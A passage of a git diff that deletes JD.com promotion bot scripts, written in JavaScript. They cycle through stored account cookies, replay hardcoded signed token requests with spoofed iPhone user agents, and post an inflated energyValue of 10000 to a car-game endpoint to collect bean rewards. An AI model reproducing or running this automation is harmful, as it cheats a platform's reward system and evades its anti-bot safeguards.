'loadSignInState': - if (data.succ) { - $.signInDay = data.data.signInDay; - break; - } - case 'signGetEnergy': - if (data.succ) { - console.log(data.msg); - } else { - console.log(data.errorMsg); - } - break; - case 'getMarketExchangeData': - if (data.succ) { - $.exchangelist = data.data; - } - break; - case 'loadShopGroup': - if (data.succ) { - $.shopId = data.data.shopId; - } - break; - case 'loadItemGroup': - if (data.succ) { - $.itemId = data.data.itemId; - $.shopId = data.data.shopId; - } - break; - case 'favouriteShopSingle': - if (data.succ) { - $.shopId = data.msg; - } - break; - case 'participantBehavior': - if (data.succ) { - $.shopId = data.msg; - } - break; - default: - $.log(JSON.stringify(data)) - break; - } - } else { - $.log(JSON.stringify(data)) - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} - -function taskPostUrl(function_id, body) { - return { - url: `https://mpdz-car-dz.isvjcloud.com/ql/front/${function_id}`, - body: JSON.stringify(body), - headers: { - "Host": "mpdz-car-dz.isvjcloud.com", - 'Content-Type': 'application/json; charset=utf-8', - "Origin": "https://mpdz-car-dz.isvjcloud.com", - "Accept-Encoding": "gzip, deflate, br", - "Connection": "keep-alive", - "Accept": "*/*", - "User-Agent": UA, - "Referer": "https://mpdz-car-dz.isvjcloud.com", - "Accept-Language": "zh-cn", - } - } -} - -function getToken() { - let opt = { - url: 'https://api.m.jd.com/client.action?functionId=isvObfuscator', - body: 'body=%7B%22url%22%3A%22https%3A//mpdz-car-dz.isvjcloud.com%22%2C%22id%22%3A%22%22%7D&uuid=dc7b67077d974365b49e479bf85a81c4&client=apple&clientVersion=9.4.0&st=1635355593000&sv=111&sign=8b67f42a305312dc59fe6f8a406e9a07', - headers: { - "Host": "api.m.jd.com", - "Content-Type": "application/x-www-form-urlencoded", - "Accept": "*/*", - "Connection": "keep-alive", - "User-Agent": "JD4iPhone/167541 (iPhone; iOS 13.5; Scale/3.00)", - "Accept-Encoding": "gzip, deflate, br", - "Cookie": cookie, - } - } - return new Promise(resolve => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - console.log(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.code === "0") { - $.token = data.token - } - } else { - $.log("京东返回了空数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} - -// prettier-ignore -function getUUID(x = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", t = 0) { return x.replace(/[xy]/g, function (x) { var r = 16 * Math.random() | 0, n = "x" == x ? r : 3 & r | 8; return uuid = t ? n.toString(36).toUpperCase() : n.toString(36), uuid }) } -function TotalBean() { return new Promise(async e => { const n = { url: "https://wq.jd.com/user_new/info/GetJDUserInfoUnion?sceneval=2", headers: { Host: "wq.jd.com", Accept: "*/*", Connection: "keep-alive", Cookie: cookie, "User-Agent": UA, "Accept-Language": "zh-cn", Referer: "https://home.m.jd.com/myJd/newhome.action?sceneval=2&ufc=&", "Accept-Encoding": "gzip, deflate, br" } }; $.get(n, (n, o, a) => { try { if (n) $.logErr(n); else if (a) { if (1001 === (a = JSON.parse(a))["retcode"]) return void ($.isLogin = !1); 0 === a["retcode"] && a.data && a.data.hasOwnProperty("userInfo") && ($.nickName = a.data.userInfo.baseInfo.nickname), 0 === a["retcode"] && a.data && a.data["assetInfo"] && ($.beanCount = a.data && a.data["assetInfo"]["beanNum"]) } else console.log("京东服务器返回空数据") } catch (e) { $.logErr(e) } finally { e() } }) }) } -function Env(t, e) { "undefined" != typeof process && JSON.stringify(process.env).indexOf("GITHUB") > -1 && process.exit(0); class s { constructor(t) { this.env = t } send(t, e = "GET") { t = "string" == typeof t ? { url: t } : t; let s = this.get; return "POST" === e && (s = this.post), new Promise((e, i) => { s.call(this, t, (t, s, r) => { t ? i(t) : e(s) }) }) } get(t) { return this.send.call(this.env, t) } post(t) { return this.send.call(this.env, t, "POST") } } return new class { constructor(t, e) { this.name = t, this.http = new s(this), this.data = null, this.dataFile = "box.dat", this.logs = [], this.isMute = !1, this.isNeedRewrite = !1, this.logSeparator = "\n", this.startTime = (new Date).getTime(), Object.assign(this, e), this.log("", `🔔${this.name}, 开始!`) } isNode() { return "undefined" != typeof module && !!module.exports } isQuanX() { return "undefined" != typeof $task } isSurge() { return "undefined" != typeof $httpClient && "undefined" == typeof $loon } isLoon() { return "undefined" != typeof $loon } toObj(t, e = null) { try { return JSON.parse(t) } catch { return e } } toStr(t, e = null) { try { return JSON.stringify(t) } catch { return e } } getjson(t, e) { let s = e; const i = this.getdata(t); if (i) try { s = JSON.parse(this.getdata(t)) } catch { } return s } setjson(t, e) { try { return this.setdata(JSON.stringify(t), e) } catch { return !1 } } getScript(t) { return new Promise(e => { this.get({ url: t }, (t, s, i) => e(i)) }) } runScript(t, e) { return new Promise(s => { let i = this.getdata("@chavy_boxjs_userCfgs.httpapi"); i = i ? i.replace(/\n/g, "").trim() : i; let r = this.getdata("@chavy_boxjs_userCfgs.httpapi_timeout"); r = r ? 1 * r : 20, r = e && e.timeout ? e.timeout : r; const [o, h] = i.split("@"), n = { url: `http://${h}/v1/scripting/evaluate`, body: { script_text: t, mock_type: "cron", timeout: r }, headers: { "X-Key": o, Accept: "*/*" } }; this.post(n, (t, e, i) => s(i)) }).catch(t => this.logErr(t)) } loaddata() { if (!this.isNode()) return {}; { this.fs = this.fs ? this.fs : require("fs"), this.path = this.path ? this.path : require("path"); const t = this.path.resolve(this.dataFile), e = this.path.resolve(process.cwd(), this.dataFile), s = this.fs.existsSync(t), i = !s && this.fs.existsSync(e); if (!s && !i) return {}; { const i = s ? t : e; try { return JSON.parse(this.fs.readFileSync(i)) } catch (t) { return {} } } } } writedata() { if (this.isNode()) { this.fs = this.fs ? this.fs : require("fs"), this.path = this.path ? this.path : require("path"); const t = this.path.resolve(this.dataFile), e = this.path.resolve(process.cwd(), this.dataFile), s = this.fs.existsSync(t), i = !s && this.fs.existsSync(e), r = JSON.stringify(this.data); s ? this.fs.writeFileSync(t, r) : i ? this.fs.writeFileSync(e, r) : this.fs.writeFileSync(t, r) } } lodash_get(t, e, s) { const i = e.replace(/\[(\d+)\]/g, ".$1").split("."); let r = t; for (const t of i) if (r = Object(r)[t], void 0 === r) return s; return r } lodash_set(t, e, s) { return Object(t) !== t ? t : (Array.isArray(e) || (e = e.toString().match(/[^.[\]]+/g) || []), e.slice(0, -1).reduce((t, s, i) => Object(t[s]) === t[s] ? t[s] : t[s] = Math.abs(e[i + 1]) >> 0 == +e[i + 1] ? [] : {}, t)[e[e.length - 1]] = s, t) } getdata(t) { let e = this.getval(t); if (/^@/.test(t)) { const [, s, i] = /^@(.*?)\.(.*?)$/.exec(t), r = s ? this.getval(s) : ""; if (r) try { const t = JSON.parse(r); e = t ? this.lodash_get(t, i, "") : e } catch (t) { e = "" } } return e } setdata(t, e) { let s = !1; if (/^@/.test(e)) { const [, i, r] = /^@(.*?)\.(.*?)$/.exec(e), o = this.getval(i), h = i ? "null" === o ? null : o || "{}" : "{}"; try { const e = JSON.parse(h); this.lodash_set(e, r, t), s = this.setval(JSON.stringify(e), i) } catch (e) { const o = {}; this.lodash_set(o, r, t), s = this.setval(JSON.stringify(o), i) } } else s = this.setval(t, e); return s } getval(t) { return this.isSurge() || this.isLoon() ? $persistentStore.read(t) : this.isQuanX() ? $prefs.valueForKey(t) : this.isNode() ? (this.data = this.loaddata(), this.data[t]) : this.data && this.data[t] || null } setval(t, e) { return this.isSurge() || this.isLoon() ? $persistentStore.write(t, e) : this.isQuanX() ? $prefs.setValueForKey(t, e) : this.isNode() ? (this.data = this.loaddata(), this.data[e] = t, this.writedata(), !0) : this.data && this.data[e] || null } initGotEnv(t) { this.got = this.got ? this.got : require("got"), this.cktough = this.cktough ? this.cktough : require("tough-cookie"), this.ckjar = this.ckjar ? this.ckjar : new this.cktough.CookieJar, t && (t.headers = t.headers ? t.headers : {}, void 0 === t.headers.Cookie && void 0 === t.cookieJar && (t.cookieJar = this.ckjar)) } get(t, e = (() => { })) { t.headers && (delete t.headers["Content-Type"], delete t.headers["Content-Length"]), this.isSurge() || this.isLoon() ? (this.isSurge() && this.isNeedRewrite && (t.headers = t.headers || {}, Object.assign(t.headers, { "X-Surge-Skip-Scripting": !1 })), $httpClient.get(t, (t, s, i) => { !t && s && (s.body = i, s.statusCode = s.status), e(t, s, i) })) : this.isQuanX() ? (this.isNeedRewrite && (t.opts = t.opts || {}, Object.assign(t.opts, { hints: !1 })), $task.fetch(t).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => e(t))) : this.isNode() && (this.initGotEnv(t), this.got(t).on("redirect", (t, e) => { try { if (t.headers["set-cookie"]) { const s = t.headers["set-cookie"].map(this.cktough.Cookie.parse).toString(); s && this.ckjar.setCookieSync(s, null), e.cookieJar = this.ckjar } } catch (t) { this.logErr(t) } }).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => { const { message: s, response: i } = t; e(s, i, i && i.body) })) } post(t, e = (() => { })) { if (t.body && t.headers && !t.headers["Content-Type"] && (t.headers["Content-Type"] = "application/x-www-form-urlencoded"), t.headers && delete t.headers["Content-Length"], this.isSurge() || this.isLoon()) this.isSurge() && this.isNeedRewrite && (t.headers = t.headers || {}, Object.assign(t.headers, { "X-Surge-Skip-Scripting": !1 })), $httpClient.post(t, (t, s, i) => { !t && s && (s.body = i, s.statusCode = s.status), e(t, s, i) }); else if (this.isQuanX()) t.method = "POST", this.isNeedRewrite && (t.opts = t.opts || {}, Object.assign(t.opts, { hints: !1 })), $task.fetch(t).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => e(t)); else if (this.isNode()) { this.initGotEnv(t); const { url: s, ...i } = t; this.got.post(s, i).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => { const { message: s, response: i } = t; e(s, i, i && i.body) }) } } time(t, e = null) { const s = e ? new Date(e) : new Date; let i = { "M+": s.getMonth() + 1, "d+": s.getDate(), "H+": s.getHours(), "m+": s.getMinutes(), "s+": s.getSeconds(), "q+": Math.floor((s.getMonth() + 3) / 3), S: s.getMilliseconds() }; /(y+)/.test(t) && (t = t.replace(RegExp.$1, (s.getFullYear() + "").substr(4 - RegExp.$1.length))); for (let e in i) new RegExp("(" + e + ")").test(t) && (t = t.replace(RegExp.$1, 1 == RegExp.$1.length ? i[e] : ("00" + i[e]).substr(("" + i[e]).length))); return t } msg(e = t, s = "", i = "", r) { const o = t => { if (!t) return t; if ("string" == typeof t) return this.isLoon() ? t : this.isQuanX() ? { "open-url": t } : this.isSurge() ? { url: t } : void 0; if ("object" == typeof t) { if (this.isLoon()) { let e = t.openUrl || t.url || t["open-url"], s = t.mediaUrl || t["media-url"]; return { openUrl: e, mediaUrl: s } } if (this.isQuanX()) { let e = t["open-url"] || t.url || t.openUrl, s = t["media-url"] || t.mediaUrl; return { "open-url": e, "media-url": s } } if (this.isSurge()) { let e = t.url || t.openUrl || t["open-url"]; return { url: e } } } }; if (this.isMute || (this.isSurge() || this.isLoon() ? $notification.post(e, s, i, o(r)) : this.isQuanX() && $notify(e, s, i, o(r))), !this.isMuteLog) { let t = ["", "==============📣系统通知📣=============="]; t.push(e), s && t.push(s), i && t.push(i), console.log(t.join("\n")), this.logs = this.logs.concat(t) } } log(...t) { t.length > 0 && (this.logs = [...this.logs, ...t]), console.log(t.join(this.logSeparator)) } logErr(t, e) { const s = !this.isSurge() && !this.isQuanX() && !this.isLoon(); s ? this.log("", `❗️${this.name}, 错误!`, t.stack) : this.log("", `❗️${this.name}, 错误!`, t) } wait(t) { return new Promise(e => setTimeout(e, t)) } done(t = {}) { const e = (new Date).getTime(), s = (e - this.startTime) / 1e3; this.log("", `🔔${this.name}, 结束! 🕛 ${s} 秒`), this.log(), (this.isSurge() || this.isQuanX() || this.isLoon()) && $done(t) } }(t, e) } diff --git a/jd_mpdzcar_game.js b/jd_mpdzcar_game.js deleted file mode 100644 index 8d59fb2..0000000 --- a/jd_mpdzcar_game.js +++ /dev/null @@ -1,326 +0,0 @@ -/* -TG https://t.me/duckjobs - -活动入口:京东汽车 - 右下角 - 领京豆 -游戏,不要问为什么分开😂 - -一天3次 - -10 6,10,12 * * * jd_mpdzcar.js -*/ -const $ = new Env('头文字J 游戏'); -const jdCookieNode = $.isNode() ? require('./jdCookie.js') : ''; -const notify = $.isNode() ? require('./sendNotify') : ''; -let cookiesArr = [], cookie = '', message = ''; -if ($.isNode()) { - Object.keys(jdCookieNode).forEach((item) => { - cookiesArr.push(jdCookieNode[item]) - }) - if (process.env.JD_DEBUG && process.env.JD_DEBUG === 'false') console.log = () => { }; -} else { - let cookiesData = $.getdata('CookiesJD') || "[]"; - cookiesData = JSON.parse(cookiesData); - cookiesArr = cookiesData.map(item => item.cookie); - cookiesArr.reverse(); - cookiesArr.push(...[$.getdata('CookieJD2'), $.getdata('CookieJD')]); - cookiesArr.reverse(); - cookiesArr = cookiesArr.filter(item => !!item); -} -!(async () => { - if (!cookiesArr[0]) { - $.msg($.name, '【提示】请先获取京东账号一cookie\n直接使用NobyDa的京东签到获取', 'https://bean.m.jd.com/bean/signIndex.action', { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - return; - } - for (let i = 0; i < cookiesArr.length; i++) { - if (cookiesArr[i]) { - cookie = cookiesArr[i] - originCookie = cookiesArr[i] - newCookie = '' - $.UserName = decodeURIComponent(cookie.match(/pt_pin=(.+?);/) && cookie.match(/pt_pin=(.+?);/)[1]) - $.index = i + 1; - $.isLogin = true; - $.nickName = ''; - await checkCookie(); - console.log(`\n******开始【京东账号${$.index}】${$.nickName || $.UserName}*********\n`); - if (!$.isLogin) { - $.msg($.name, `【提示】cookie已失效`, `京东账号${$.index} ${$.nickName || $.UserName}\n请重新登录获取\nhttps://bean.m.jd.com/bean/signIndex.action`, { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - if ($.isNode()) { - await notify.sendNotify(`${$.name}cookie已失效 - ${$.UserName}`, `京东账号${$.index} ${$.UserName}\n请重新登录获取cookie`); - } - continue - } - $.bean = 0; - $.ADID = getUUID('xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx', 1); - $.UUID = getUUID('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'); - $.authorNum = `${random(1000000, 9999999)}` - $.activityId = '1760007' - $.activityUrl = `https://mpdz-car-dz.isvjcloud.com/h5/?lng=00.000000&lat=00.000000&sid=&un_area=` - await mpdzCar() - await $.wait(5000); - if ($.bean > 0) { - message += `\n【京东账号${$.index}】${$.nickName || $.UserName} \n └ 获得 ${$.bean} 京豆。` - } - } - } - if (message !== '') { - if ($.isNode()) { - await notify.sendNotify($.name, message, '', `\n`); - } else { - $.msg($.name, '有点儿收获', message); - } - } -})() - .catch((e) => { - $.log('', `❌ ${$.name}, 失败! 原因: ${e}!`, '') - }) - .finally(() => { - $.done(); - }) - - -async function mpdzCar() { - $.token = null; - $.buyerNick = null; - await getToken(); - if ($.token) { - await task('/ql/front/getFansInfo', { - "data": $.token, - "source": "01", - // "ceshi": "1000004065" - }) - // console.log($.buyerNick) - if ($.buyerNick) { - console.log("游戏") - await task('/ql/front/carPlayUpdate', { - buyerNick: $.buyerNick, - "behavior": "run", - "energyValue": 10000, - }) - } else { - console.log("can't got buyerNick"); - } - } else { - console.log("can't got token"); - } -} - -function task(function_id, body, isCommon = 0) { - let comBody = { - actId: $.activityId, - // method: function_id, - // "userId": "" - } - Object.assign(body, comBody) - return new Promise(resolve => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.succ) { - switch (function_id) { - case '/ql/front/getFansInfo': - $.buyerNick = data.msg - break; - case '/ql/front/loadUnitedCardActivityInfo': - $.activityContent = data.data - break; - case '/ql/front/loadShopGroup': - $.shopList = data.data - break; - case '/ql/front/loadAssociationState': - $.associationState = data.data; - break; - case '/ql/front/participantBehavior': - console.log(data.msg); - if (data.data && data.data.awardName) { - console.log('mission completed,awarded:' + data.data.awardName); - } - break; - case '/ql/front/carPlayUpdate': - console.log(data) - break; - case '/ql/front/exchangeMarket': - console.log(data) - break; - } - } else { - console.log(data.errorMsg); - } - } else { - $.log("京东没有返回数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} -function bindWithVender(venderId, channel = 401) { - let opt = { - url: `https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=bindWithVender&body=${encodeURIComponent(JSON.stringify({ "venderId": venderId, "bindByVerifyCodeFlag": 1, "registerExtend": { }, "writeChildFlag": 0, "channel": channel }))}&client=H5&clientVersion=9.2.0&uuid=88888`, - headers: { - Host: 'api.m.jd.com', - Accept: '*/*', - Connection: 'keep-alive', - Cookie: cookie, - 'User-Agent': `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - 'Accept-Language': 'zh-cn', - Referer: `https://shopmember.m.jd.com/shopcard/?venderId=${venderId}}&channel=401&returnUrl=${encodeURIComponent($.activityUrl)}`, - 'Accept-Encoding': 'gzip, deflate, br' - } - } - return new Promise(resolve => { - $.get(opt, (err, resp, data) => { - try { - if (err) { - console.log(err) - } else { - res = JSON.parse(data) - if (res.success) { - if (res.result && res.result.giftInfo) { - if (res.result.giftInfo.giftList) { - for (const vo of res.result.giftInfo.giftList) { - $.log(vo.name) - if (vo.prizeType === 4) { - $.log(`==>获得【${vo.quantity}】京豆`) - $.bean += vo.quantity - } - } - } - - } - } - } - } catch (error) { - console.log(error) - } finally { - resolve(); - } - }) - - }) -} -function taskUrl(function_id, body, isCommon) { - return { - url: isCommon ? `https://mpdz-car-dz.isvjcloud.com/${function_id}` : `https://mpdz-car-dz.isvjcloud.com${function_id}`, - headers: { - Host: 'mpdz-car-dz.isvjcloud.com', - Accept: 'application/json', - 'X-Requested-With': 'XMLHttpRequest', - 'Accept-Language': 'zh-cn', - 'Accept-Encoding': 'gzip, deflate, br', - 'Content-Type': 'application/json; charset=UTF-8', - Origin: 'https://mpdz-car-dz.isvjcloud.comm', - 'User-Agent': `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: 'keep-alive', - Referer: $.activityUrl - }, - body: JSON.stringify(body) - - } -} - -function getToken() { - let opt = { - url: `https://api.m.jd.com/client.action?functionId=isvObfuscator`, - headers: { - Host: 'api.m.jd.com', - 'Content-Type': 'application/x-www-form-urlencoded', - Accept: '*/*', - Connection: 'keep-alive', - Cookie: cookie, - 'User-Agent': 'JD4iPhone/167650 (iPhone; iOS 13.7; Scale/3.00)', - 'Accept-Language': 'zh-Hans-CN;q=1', - 'Accept-Encoding': 'gzip, deflate, br', - }, - body: `body=%7B%22url%22%3A%20%22https%3A//lzdz1-isv.isvjcloud.com%22%2C%20%22id%22%3A%20%22%22%7D&uuid=72124265217d48b7955781024d65bbc4&client=apple&clientVersion=9.4.0&st=1621796702000&sv=120&sign=14f7faa31356c74e9f4289972db4b988` - } - return new Promise(resolve => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.code === "0") { - $.token = data.token - } - } else { - $.log("京东返回了空数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} -function random(min, max) { - - return Math.floor(Math.random() * (max - min)) + min; - -} -function getUUID(format = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', UpperCase = 0) { - return format.replace(/[xy]/g, function (c) { - var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8); - if (UpperCase) { - uuid = v.toString(36).toUpperCase(); - } else { - uuid = v.toString(36) - } - return uuid; - }); -} -function checkCookie() { - const options = { - url: "https://me-api.jd.com/user_new/info/GetJDUserInfoUnion", - headers: { - "Host": "me-api.jd.com", - "Accept": "*/*", - "Connection": "keep-alive", - "Cookie": cookie, - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1", - "Accept-Language": "zh-cn", - "Referer": "https://home.m.jd.com/myJd/newhome.action?sceneval=2&ufc=&", - "Accept-Encoding": "gzip, deflate, br", - } - }; - return new Promise(resolve => { - $.get(options, (err, resp, data) => { - try { - if (err) { - $.logErr(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.retcode === "1001") { - $.isLogin = false; //cookie过期 - return; - } - if (data.retcode === "0" && data.data.hasOwnProperty("userInfo")) { - $.nickName = data.data.userInfo.baseInfo.nickname; - } - } else { - $.log('京东返回了空数据'); - } - } - } catch (e) { - $.logErr(e) - } finally { - resolve(); - } - }) - }) -} -// prettier-ignore -!function (n) { "use strict"; function t(n, t) { var r = (65535 & n) + (65535 & t); return (n >> 16) + (t >> 16) + (r >> 16) << 16 | 65535 & r } function r(n, t) { return n << t | n >>> 32 - t } function e(n, e, o, u, c, f) { return t(r(t(t(e, n), t(u, f)), c), o) } function o(n, t, r, o, u, c, f) { return e(t & r | ~t & o, n, t, u, c, f) } function u(n, t, r, o, u, c, f) { return e(t & o | r & ~o, n, t, u, c, f) } function c(n, t, r, o, u, c, f) { return e(t ^ r ^ o, n, t, u, c, f) } function f(n, t, r, o, u, c, f) { return e(r ^ (t | ~o), n, t, u, c, f) } function i(n, r) { n[r >> 5] |= 128 << r % 32, n[14 + (r + 64 >>> 9 << 4)] = r; var e, i, a, d, h, l = 1732584193, g = -271733879, v = -1732584194, m = 271733878; for (e = 0; e < n.length; e += 16)i = l, a = g, d = v, h = m, g = f(g = f(g = f(g = f(g = c(g = c(g = c(g = c(g = u(g = u(g = u(g = u(g = o(g = o(g = o(g = o(g, v = o(v, m = o(m, l = o(l, g, v, m, n[e], 7, -680876936), g, v, n[e + 1], 12, -389564586), l, g, n[e + 2], 17, 606105819), m, l, n[e + 3], 22, -1044525330), v = o(v, m = o(m, l = o(l, g, v, m, n[e + 4], 7, -176418897), g, v, n[e + 5], 12, 1200080426), l, g, n[e + 6], 17, -1473231341), m, l, n[e + 7], 22, -45705983), v = o(v, m = o(m, l = o(l, g, v, m, n[e + 8], 7, 1770035416), g, v, n[e + 9], 12, -1958414417), l, g, n[e + 10], 17, -42063), m, l, n[e + 11], 22, -1990404162), v = o(v, m = o(m, l = o(l, g, v, m, n[e + 12], 7, 1804603682), g, v, n[e + 13], 12, -40341101), l, g, n[e + 14], 17, -1502002290), m, l, n[e + 15], 22, 1236535329), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 1], 5, -165796510), g, v, n[e + 6], 9, -1069501632), l, g, n[e + 11], 14, 643717713), m, l, n[e], 20, -373897302), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 5], 5, -701558691), g, v, n[e + 10], 9, 38016083), l, g, n[e + 15], 14, -660478335), m, l, n[e + 4], 20, -405537848), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 9], 5, 568446438), g, v, n[e + 14], 9, -1019803690), l, g, n[e + 3], 14, -187363961), m, l, n[e + 8], 20, 1163531501), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 13], 5, -1444681467), g, v, n[e + 2], 9, -51403784), l, g, n[e + 7], 14, 1735328473), m, l, n[e + 12], 20, -1926607734), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 5], 4, -378558), g, v, n[e + 8], 11, -2022574463), l, g, n[e + 11], 16, 1839030562), m, l, n[e + 14], 23, -35309556), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 1], 4, -1530992060), g, v, n[e + 4], 11, 1272893353), l, g, n[e + 7], 16, -155497632), m, l, n[e + 10], 23, -1094730640), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 13], 4, 681279174), g, v, n[e], 11, -358537222), l, g, n[e + 3], 16, -722521979), m, l, n[e + 6], 23, 76029189), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 9], 4, -640364487), g, v, n[e + 12], 11, -421815835), l, g, n[e + 15], 16, 530742520), m, l, n[e + 2], 23, -995338651), v = f(v, m = f(m, l = f(l, g, v, m, n[e], 6, -198630844), g, v, n[e + 7], 10, 1126891415), l, g, n[e + 14], 15, -1416354905), m, l, n[e + 5], 21, -57434055), v = f(v, m = f(m, l = f(l, g, v, m, n[e + 12], 6, 1700485571), g, v, n[e + 3], 10, -1894986606), l, g, n[e + 10], 15, -1051523), m, l, n[e + 1], 21, -2054922799), v = f(v, m = f(m, l = f(l, g, v, m, n[e + 8], 6, 1873313359), g, v, n[e + 15], 10, -30611744), l, g, n[e + 6], 15, -1560198380), m, l, n[e + 13], 21, 1309151649), v = f(v, m = f(m, l = f(l, g, v, m, n[e + 4], 6, -145523070), g, v, n[e + 11], 10, -1120210379), l, g, n[e + 2], 15, 718787259), m, l, n[e + 9], 21, -343485551), l = t(l, i), g = t(g, a), v = t(v, d), m = t(m, h); return [l, g, v, m] } function a(n) { var t, r = "", e = 32 * n.length; for (t = 0; t < e; t += 8)r += String.fromCharCode(n[t >> 5] >>> t % 32 & 255); return r } function d(n) { var t, r = []; for (r[(n.length >> 2) - 1] = void 0, t = 0; t < r.length; t += 1)r[t] = 0; var e = 8 * n.length; for (t = 0; t < e; t += 8)r[t >> 5] |= (255 & n.charCodeAt(t / 8)) << t % 32; return r } function h(n) { return a(i(d(n), 8 * n.length)) } function l(n, t) { var r, e, o = d(n), u = [], c = []; for (u[15] = c[15] = void 0, o.length > 16 && (o = i(o, 8 * n.length)), r = 0; r < 16; r += 1)u[r] = 909522486 ^ o[r], c[r] = 1549556828 ^ o[r]; return e = i(u.concat(d(t)), 512 + 8 * t.length), a(i(c.concat(e), 640)) } function g(n) { var t, r, e = ""; for (r = 0; r < n.length; r += 1)t = n.charCodeAt(r), e += "0123456789abcdef".charAt(t >>> 4 & 15) + "0123456789abcdef".charAt(15 & t); return e } function v(n) { return unescape(encodeURIComponent(n)) } function m(n) { return h(v(n)) } function p(n) { return g(m(n)) } function s(n, t) { return l(v(n), v(t)) } function C(n, t) { return g(s(n, t)) } function A(n, t, r) { return t ? r ? s(t, n) : C(t, n) : r ? m(n) : p(n) } $.md5 = A }(this); -function Env(t, e) { "undefined" != typeof process && JSON.stringify(process.env).indexOf("GITHUB") > -1 && process.exit(0); class s { constructor(t) { this.env = t } send(t, e = "GET") { t = "string" == typeof t ? { url: t } : t; let s = this.get; return "POST" === e && (s = this.post), new Promise((e, i) => { s.call(this, t, (t, s, r) => { t ? i(t) : e(s) }) }) } get(t) { return this.send.call(this.env, t) } post(t) { return this.send.call(this.env, t, "POST") } } return new class { constructor(t, e) { this.name = t, this.http = new s(this), this.data = null, this.dataFile = "box.dat", this.logs = [], this.isMute = !1, this.isNeedRewrite = !1, this.logSeparator = "\n", this.startTime = (new Date).getTime(), Object.assign(this, e), this.log("", `🔔${this.name}, 开始!`) } isNode() { return "undefined" != typeof module && !!module.exports } isQuanX() { return "undefined" != typeof $task } isSurge() { return "undefined" != typeof $httpClient && "undefined" == typeof $loon } isLoon() { return "undefined" != typeof $loon } toObj(t, e = null) { try { return JSON.parse(t) } catch { return e } } toStr(t, e = null) { try { return JSON.stringify(t) } catch { return e } } getjson(t, e) { let s = e; const i = this.getdata(t); if (i) try { s = JSON.parse(this.getdata(t)) } catch { } return s } setjson(t, e) { try { return this.setdata(JSON.stringify(t), e) } catch { return !1 } } getScript(t) { return new Promise(e => { this.get({ url: t }, (t, s, i) => e(i)) }) } runScript(t, e) { return new Promise(s => { let i = this.getdata("@chavy_boxjs_userCfgs.httpapi"); i = i ? i.replace(/\n/g, "").trim() : i; let r = this.getdata("@chavy_boxjs_userCfgs.httpapi_timeout"); r = r ? 1 * r : 20, r = e && e.timeout ? e.timeout : r; const [o, h] = i.split("@"), n = { url: `http://${h}/v1/scripting/evaluate`, body: { script_text: t, mock_type: "cron", timeout: r }, headers: { "X-Key": o, Accept: "*/*" } }; this.post(n, (t, e, i) => s(i)) }).catch(t => this.logErr(t)) } loaddata() { if (!this.isNode()) return { }; { this.fs = this.fs ? this.fs : require("fs"), this.path = this.path ? this.path : require("path"); const t = this.path.resolve(this.dataFile), e = this.path.resolve(process.cwd(), this.dataFile), s = this.fs.existsSync(t), i = !s && this.fs.existsSync(e); if (!s && !i) return { }; { const i = s ? t : e; try { return JSON.parse(this.fs.readFileSync(i)) } catch (t) { return { } } } } } writedata() { if (this.isNode()) { this.fs = this.fs ? this.fs : require("fs"), this.path = this.path ? this.path : require("path"); const t = this.path.resolve(this.dataFile), e = this.path.resolve(process.cwd(), this.dataFile), s = this.fs.existsSync(t), i = !s && this.fs.existsSync(e), r = JSON.stringify(this.data); s ? this.fs.writeFileSync(t, r) : i ? this.fs.writeFileSync(e, r) : this.fs.writeFileSync(t, r) } } lodash_get(t, e, s) { const i = e.replace(/\[(\d+)\]/g, ".$1").split("."); let r = t; for (const t of i) if (r = Object(r)[t], void 0 === r) return s; return r } lodash_set(t, e, s) { return Object(t) !== t ? t : (Array.isArray(e) || (e = 